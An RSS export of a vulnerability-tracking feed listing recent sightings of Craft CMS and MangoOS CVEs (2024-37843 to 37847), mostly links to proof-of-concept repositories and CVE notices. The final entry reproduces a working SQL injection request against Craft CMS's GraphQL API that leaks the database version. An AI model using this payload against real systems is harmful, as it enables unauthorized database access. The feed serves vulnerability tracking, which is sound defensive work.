https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Sun, 28 Jun 2026 11:30:21 +0000 https://vulnerability.circl.lu/sighting/f9777920-c77c-43d7-a584-439998eb2212/export {"uuid": "f9777920-c77c-43d7-a584-439998eb2212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10932", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:46:18.000000Z"} {"uuid": "f9777920-c77c-43d7-a584-439998eb2212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10932", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:46:18.000000Z"} https://vulnerability.circl.lu/sighting/f9777920-c77c-43d7-a584-439998eb2212/export Sun, 04 Aug 2024 16:46:18 +0000 https://vulnerability.circl.lu/sighting/cdc11837-9a64-456b-abc2-f9ab4a868aee/export {"uuid": "cdc11837-9a64-456b-abc2-f9ab4a868aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2945", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-08-05T03:25:02.000000Z"} {"uuid": "cdc11837-9a64-456b-abc2-f9ab4a868aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2945", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-08-05T03:25:02.000000Z"} https://vulnerability.circl.lu/sighting/cdc11837-9a64-456b-abc2-f9ab4a868aee/export Mon, 05 Aug 2024 03:25:02 +0000 https://vulnerability.circl.lu/sighting/6cee97e4-6a7f-4e6c-a436-286cc997edba/export {"uuid": "6cee97e4-6a7f-4e6c-a436-286cc997edba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3544", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-16T11:19:37.000000Z"} {"uuid": "6cee97e4-6a7f-4e6c-a436-286cc997edba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3544", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-16T11:19:37.000000Z"} https://vulnerability.circl.lu/sighting/6cee97e4-6a7f-4e6c-a436-286cc997edba/export Fri, 16 Aug 2024 11:19:37 +0000 https://vulnerability.circl.lu/sighting/3e6426ae-55f8-4b6b-be92-1bf8846959de/export {"uuid": "3e6426ae-55f8-4b6b-be92-1bf8846959de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "Telegram/GAGweLsjUHO08v93h7Cnk4JIohd6mOph5G5IJ8nyyZIxNfo", "content": "", "creation_timestamp": "2024-09-08T07:41:49.000000Z"} {"uuid": "3e6426ae-55f8-4b6b-be92-1bf8846959de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "Telegram/GAGweLsjUHO08v93h7Cnk4JIohd6mOph5G5IJ8nyyZIxNfo", "content": "", "creation_timestamp": "2024-09-08T07:41:49.000000Z"} https://vulnerability.circl.lu/sighting/3e6426ae-55f8-4b6b-be92-1bf8846959de/export Sun, 08 Sep 2024 07:41:49 +0000 https://vulnerability.circl.lu/sighting/b0f039d8-a6ce-4510-bce7-a9486813f14c/export {"uuid": "b0f039d8-a6ce-4510-bce7-a9486813f14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37846", "type": "seen", "source": "https://t.me/cvedetector/8975", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37846 - MangoOS Client-Side Template Injection\", \n \"Content\": \"CVE ID : CVE-2024-37846 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain a Client-Side Template Injection (CSTI) vulnerability via the Platform Management Edit page. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:11.000000Z"} {"uuid": "b0f039d8-a6ce-4510-bce7-a9486813f14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37846", "type": "seen", "source": "https://t.me/cvedetector/8975", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37846 - MangoOS Client-Side Template Injection\", \n \"Content\": \"CVE ID : CVE-2024-37846 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain a Client-Side Template Injection (CSTI) vulnerability via the Platform Management Edit page. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:11.000000Z"} https://vulnerability.circl.lu/sighting/b0f039d8-a6ce-4510-bce7-a9486813f14c/export Fri, 25 Oct 2024 22:06:11 +0000 https://vulnerability.circl.lu/sighting/63c49148-5828-4dc5-957f-9d6f78a1fbf3/export {"uuid": "63c49148-5828-4dc5-957f-9d6f78a1fbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37847", "type": "seen", "source": "https://t.me/cvedetector/8976", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37847 - MangoOS MangoAPI Remote Code Execution\", \n \"Content\": \"CVE ID : CVE-2024-37847 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : An arbitrary file upload vulnerability in MangoOS before 5.1.4 and Mango API before 4.5.5 allows attackers to execute arbitrary code via a crafted file. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:12.000000Z"} {"uuid": "63c49148-5828-4dc5-957f-9d6f78a1fbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37847", "type": "seen", "source": "https://t.me/cvedetector/8976", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37847 - MangoOS MangoAPI Remote Code Execution\", \n \"Content\": \"CVE ID : CVE-2024-37847 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : An arbitrary file upload vulnerability in MangoOS before 5.1.4 and Mango API before 4.5.5 allows attackers to execute arbitrary code via a crafted file. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:12.000000Z"} https://vulnerability.circl.lu/sighting/63c49148-5828-4dc5-957f-9d6f78a1fbf3/export Fri, 25 Oct 2024 22:06:12 +0000 https://vulnerability.circl.lu/sighting/1ce781e4-a227-4685-bc66-4db9b4069f27/export {"uuid": "1ce781e4-a227-4685-bc66-4db9b4069f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37844", "type": "seen", "source": "https://t.me/cvedetector/8978", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37844 - MangoOS Stored Cross-Site Scripting (XSS)\", \n \"Content\": \"CVE ID : CVE-2024-37844 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : A stored cross-site scripting (XSS) vulnerability in MangoOS before 5.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:13.000000Z"} {"uuid": "1ce781e4-a227-4685-bc66-4db9b4069f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37844", "type": "seen", "source": "https://t.me/cvedetector/8978", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37844 - MangoOS Stored Cross-Site Scripting (XSS)\", \n \"Content\": \"CVE ID : CVE-2024-37844 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : A stored cross-site scripting (XSS) vulnerability in MangoOS before 5.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:13.000000Z"} https://vulnerability.circl.lu/sighting/1ce781e4-a227-4685-bc66-4db9b4069f27/export Fri, 25 Oct 2024 22:06:13 +0000 https://vulnerability.circl.lu/sighting/fe93ff33-ba51-4dff-8898-4d9725359315/export {"uuid": "fe93ff33-ba51-4dff-8898-4d9725359315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37845", "type": "seen", "source": "https://t.me/cvedetector/8979", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37845 - MangoOS Active Process Command RCE Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-37845 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the Active Process Command feature. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:14.000000Z"} {"uuid": "fe93ff33-ba51-4dff-8898-4d9725359315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37845", "type": "seen", "source": "https://t.me/cvedetector/8979", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-37845 - MangoOS Active Process Command RCE Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-37845 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the Active Process Command feature. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"25 Oct 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:14.000000Z"} https://vulnerability.circl.lu/sighting/fe93ff33-ba51-4dff-8898-4d9725359315/export Fri, 25 Oct 2024 22:06:14 +0000 https://vulnerability.circl.lu/sighting/c3dac80a-0fc8-4c48-b153-5d9b04f34523/export {"uuid": "c3dac80a-0fc8-4c48-b153-5d9b04f34523", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/144", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"} {"uuid": "c3dac80a-0fc8-4c48-b153-5d9b04f34523", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/144", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"} https://vulnerability.circl.lu/sighting/c3dac80a-0fc8-4c48-b153-5d9b04f34523/export Sat, 21 Dec 2024 15:57:30 +0000 https://vulnerability.circl.lu/sighting/49a8e55a-93ad-4343-a876-afd48e725c0f/export {"uuid": "49a8e55a-93ad-4343-a876-afd48e725c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/142", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query IntrospectionQuery {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"} {"uuid": "49a8e55a-93ad-4343-a876-afd48e725c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/142", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query IntrospectionQuery {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"} https://vulnerability.circl.lu/sighting/49a8e55a-93ad-4343-a876-afd48e725c0f/export Sat, 21 Dec 2024 15:57:30 +0000